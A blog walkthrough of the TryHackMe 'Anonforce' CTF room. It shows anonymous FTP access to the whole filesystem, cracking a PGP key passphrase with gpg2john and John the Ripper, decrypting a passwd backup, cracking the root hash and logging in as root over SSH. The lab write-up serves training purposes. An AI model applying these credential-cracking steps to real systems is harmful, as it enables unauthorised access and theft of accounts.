narancs's blog

TryHackMe – Anonforce walkthrough

Introduction

Logo of Anonforce CTF room

This is a walkthrough of the Anonforce CTF room on TryHackMe. It is an easy boot2root machine where we need to get access to the target through FTP.

Enumeration

I ran nmap scan that already revealed a lot of information to get started.

We can see that FTP and SSH services are open on the target. FTP is not only open but accessible via anonymous user. It seems the entire root filesystem is accessible from there (except the lost+found and root directories with 700 permissions). Let’s connect to FTP and look around.

user.txt

After looking inside /home we can find the home directory of melodias that contains the user flag.

root.txt

Another interesting directory that immediately catches the eye is the one named notread in the root filesystem. If we check the files inside we can find backup.pgp and private.asc files.
				
					ftp> ls -la
229 Entering Extended Passive Mode (|||7501|)
150 Here comes the directory listing.
drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 .
drwxr-xr-x   23 0        0            4096 Aug 11  2019 ..
-rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
-rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc
226 Directory send OK.
ftp> 

				
			

We have an encrypted backup.pgp file, and very likely a private key file that we can use to decrypt it.

First, what we need to do is import the private key into our keyring (key management database) of the PGP application. We can do it via the command line using the following command:

				
					gpg --import private.asc
				
			

However, we will get a popup window asking for a passphrase because the private key is protected.

We need to crack the passphrase in order to import it into the keyring. We can use John the Ripper password-cracking tool for this. For we need to convert the private key file into a hash using the following command:

				
					gpg2john private.asc > privatehash.txt
				
			

Now we can run john to crack the hash using the famous rockyou.txt dictionary.

				
					john privatehash.txt --wordlist=/usr/share/wordlists/rockyou.txt
				
			

Now that we have the passphrase for the private key, we can import it into the keyring and decrypt the backup.pgp file.

				
					gpg --import private.asc
gpg --decrypt backup.pgp
				
			

We will get a backup of the passwd file, that includes the password hash of root and melodias users (although we already have the user flag from FTP). Let’s try and crack the password of root.

				
					echo -e 'root:$6$07nYFaYf$F4VMa*** COMPLETE THE HASH HERE ***Nd2tV4uob5RVM0:18120:0:99999:7:::' > roothash.txt
john roothash.txt --wordlist=/usr/share/wordlists/rockyou.txt
				
			

Now we can SSH to the target as root and grab the root flag.

				
					narancs@kali:~/THM/bsidesgtanonforce$ ssh root@10.10.241.75
The authenticity of host '10.10.241.75 (10.10.241.75)' can't be established.
ED25519 key fingerprint is SHA256:+bhLW3R5qYI2SvPQsCWR9ewCoewWWvFfTVFQUAGr+ew.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:86: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.241.75' (ED25519) to the list of known hosts.
root@10.10.241.75's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-157-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@ubuntu:~# cat /root/root.txt 
f7*** HIDDEN ***ce
root@ubuntu:~# 

				
			

Table of Contents

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related posts

0
Would love your thoughts, please comment.x
()
x